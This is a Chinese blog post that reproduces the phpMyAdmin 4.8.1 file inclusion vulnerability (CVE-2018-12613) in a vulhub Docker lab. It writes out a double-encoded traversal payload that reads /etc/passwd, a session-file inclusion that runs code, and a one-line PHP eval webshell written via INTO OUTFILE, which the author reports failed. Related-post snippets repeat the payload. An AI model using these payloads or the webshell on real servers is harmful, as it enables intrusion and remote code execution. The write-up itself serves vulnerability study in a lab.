phpmyadmin 4.8.1远程文件包含漏洞(CVE-2018-12613)

已于 2022-12-06 19:38:37 修改
阅读量547 收藏 1
点赞数 5
文章标签: 安全
于 2022-12-06 19:10:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46789316/article/details/128208116
版权

准备


环境:ubuntu
使用容器:docker vulhub
vulhub文档: https://vulhub.org/#/environments/phpmyadmin/CVE-2018-12613/

1. 启动容器

sudo docker-compose up -d

在这里插入图片描述

2.查看IP

ifconfig

在这里插入图片描述

3.查看靶场端口

docker ps -a

在这里插入图片描述

4. 访问靶场


在这里插入图片描述

4. 访问靶场


exp: 

?target=db_sql.php%253f/../../../../../../../../etc/passwd

结果表明,该文件包含漏洞存在:
在这里插入图片描述

我们可以执行SELECT '< ? = phpinfo() ? >' ;,然后F12检查你的sessionid (phpMyAdmin的cookie的值),然后包括会话文件:
在这里插入图片描述

在这里插入图片描述

?target=db_sql.php%253f/../../../../../../../../../../tmp/sess_[session]

http://192.168.199.130:2003/?target=db_sql.php%253f/../../../../../../../../../../tmp/sess_666b8cdccef54e796ecc0c76493dafb2

在这里插入图片描述
并且获取网页当前的绝对路径

在这里插入图片描述

select '<?php @eval($_POST[pass])?> ' into outfile '/var/www/html/hello.php'

在这里插入图片描述
没有权限 写入不了木马 漏洞危害较低

Sweetie_x
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613)复现
ximo的博客
03-22 962
CVE-2018-12613 简介: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 搭建环境: 使用docker+vulhub的环境。 复现过程: 访问: index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd 可以查看到文件信息: 说明存在文件包含。 在sql中执行SELECT '<?=phpinfo()?&gt
phpMyAdmin 4.8.1 远程文件包含漏洞复现
不想当脚本小子的脚本小子
04-04 1009
0x01 漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在phpMyAdmin 4.8.2 之前的 4.8.x 版本中,其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 影响范围 phpMyAdmin 4.8.0 phpMyAdmin 4.8.1 0x02 漏洞环境 使用vulnhub快速搭建靶场 bash cd /vulhub/phpmyadmin/CVE-2018-12613 sudo docker-comp
CVE-2018-16341】nuxeo远程代码执行漏洞
liuxiaoning_的博客
09-20 279
复现并分析【CVE-2018-16341】nuxeo远程代码执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现该漏洞,利用exp获取shell。
phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)
weixin_63231007的博客
10-08 2745
_REQUEST['target'] 搜索数组$target_blacklist 中不存在指定的值( ‘import.php’, ‘export.php’)target=db_sql.php%253f/../../../../../../../../../../tmp/sess_[session]target=db_sql.php%253f../../../../../../../../flag 得到flag。$_REQUEST['target'] 参数携带的内容是字符串。
phpmyadmin4.8.1漏洞复现-远程文件包含
weixin_54555816的博客
04-10 4345
phpMyAdmin4.8.0 - 4.8.1版本均受漏洞影响。 环境搭建:phpstudy+windows+phpmyadmin4.8.1 注意要将phpmyadmin解压下载到phpstudy网站根目录 像我这里的根目录就是在www目录这里 解压之后再打开localhost/phpMyAdmin 或者127.0.0.1/phpMyAdmin 默认的初始账号和密码都是root,但是由于我之前修改了mysql的密码,所以这个密码就和MySQL的密码一样 然后来到这个phpmyadm.
Ubuntu 20.04 Apache Http Server安全漏洞解决
weixin_58269397的博客
03-24 1200
安全扫描出严重漏洞,如下图所示等大量漏洞。由于通过Ubuntu 20.04 软件源安装的Apache2最新版本是2.4.41, 这个版本目前存在诸多的高危安全漏洞,所以需要把Apache2升级到最新版本。
HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现
qq_44005305的博客
08-31 191
最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。
文件包含漏洞
一只web狗
06-24 1933
文件包含漏洞概述
phpmyadmin 远程文件包含漏洞CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-05
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x ...
文件包含漏洞原理与实践
Innocence_0的博客
10-15 61
一、什么是文件包含漏洞文件包含漏洞常出现在「PHP语言」中。PHP为了提高「代码复用性」,提供了文件包含函数 include() 和 require(),被包含的文件内容会被当做代码来执行。就像造轮子一样:把「重复使用」的一段代码,单独写到一个文件里,再用文件包含函数来包含这个文件。为了灵活的包含文件,一些程序员会把文件名通过「参数」的形式传递给文件包含函数。当传递文件名的参数可以被用户「修改」时,用户就可以包含任意文件,而文件中的代码就会被服务器执行,这就造成了文件包含漏洞
CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞
weixin_51387754的博客
12-07 2767
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞环境 执行如下命令,启动phpmyadmin 4.8.1: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可进入phpmyadmin。配置的是“config”模式,所以无需输入密码,直接登录test账户。 漏洞复现 访问http://your-ip:8080/index.ph
漏洞复现-phpmyadmin-文件包含CVE-2014-8959
10-14 2604
phpmyadmin-文件包含】鸡肋
[CVE-2018-12613]phpmyadmin4.8.1远程文件包含漏洞复现
https://www.cnblogs.com/zpchcbd/
08-31 519
漏洞原理: 一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码 $ cfg [‘S...
CVE-2018-12613 PHPmyadmin文件包含漏洞
m0_48736242的博客
10-14 702
CVE-2018-12613 PHPmyadmin文件包含漏洞
Weblogic任意文件上传漏洞复现(CVE-2018-2894)
懂进攻知防守
07-21 746
Weblogic Web 服务测试客户端,其配置页面存在未授权访问的问题,路径为**/ws_utc/config.do**、**/ws_utc/begin.do。可造成任意文件上传漏洞,文章完整复现该漏洞并提供修复建议!
医疗健康信息的安全挑战与隐私保护最佳实践
最新发布
2301_79955948的博客
07-12 1314
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
CVE-2016-5734
09-04
CVE-2016-5734是一个针对PHPMyAdmin漏洞,该漏洞允许远程攻击者执行任意命令。该漏洞可以通过使用提供的Python脚本来利用,脚本可以在指定的URL上执行特定命令。如果你想进一步了解该漏洞以及如何分析它,可以参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值